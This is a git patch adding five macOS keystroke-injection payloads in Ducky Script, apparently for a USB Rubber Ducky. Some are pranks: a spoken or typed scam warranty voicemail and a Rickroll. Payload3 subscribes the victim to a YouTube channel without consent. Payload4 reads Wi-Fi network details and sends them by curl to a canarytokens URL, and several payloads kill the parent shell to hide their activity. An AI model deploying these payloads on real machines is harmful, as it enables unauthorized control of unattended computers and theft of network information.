From c7e1b198fc953ae7c28387b3b5a4622037464875 Mon Sep 17 00:00:00 2001 From: Alex Lynd Date: Thu, 6 Jan 2022 01:22:57 -0700 Subject: [PATCH] meow! --- payload.dd | 8 ++++++++ payload1.dd | 7 +++++++ payload2.dd | 9 +++++++++ payload3.dd | 13 +++++++++++++ payload4.dd | 8 ++++++++ 5 files changed, 45 insertions(+) create mode 100644 payload.dd create mode 100644 payload1.dd create mode 100644 payload2.dd create mode 100644 payload3.dd create mode 100644 payload4.dd diff --git a/payload.dd b/payload.dd new file mode 100644 index 0000000..97d71dc --- /dev/null +++ b/payload.dd @@ -0,0 +1,8 @@ +REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka +GUI SPACE +DELAY 500 +STRING terminal.app +ENTER +DELAY 1000 +STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=) +ENTER \ No newline at end of file diff --git a/payload1.dd b/payload1.dd new file mode 100644 index 0000000..6d9045a --- /dev/null +++ b/payload1.dd @@ -0,0 +1,7 @@ +REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022 +GUI SPACE +STRING textedit +ENTER +DELAY 1000 +CTRL N +STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders. diff --git a/payload2.dd b/payload2.dd new file mode 100644 index 0000000..603ae5b --- /dev/null +++ b/payload2.dd @@ -0,0 +1,9 @@ +REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022 +GUI SPACE +STRING terminal.app +ENTER +DELAY 1000 +STRING open "https://youtu.be/dQw4w9WgXcQ" +ENTER +DELAY 2000 +SPACE \ No newline at end of file diff --git a/payload3.dd b/payload3.dd new file mode 100644 index 0000000..cf542a6 --- /dev/null +++ b/payload3.dd @@ -0,0 +1,13 @@ +REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022 +GUI SPACE +STRING terminal.app +ENTER +DELAY 1000 +STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1" +DELAY 500 +ENTER +DELAY 4000 +TAB +TAB +ENTER +ENTER \ No newline at end of file diff --git a/payload4.dd b/payload4.dd new file mode 100644 index 0000000..81219f7 --- /dev/null +++ b/payload4.dd @@ -0,0 +1,8 @@ +REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022 +GUI SPACE +STRING terminal.app +ENTER +DELAY 2000 +STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=) +DELAY 500 +ENTER \ No newline at end of file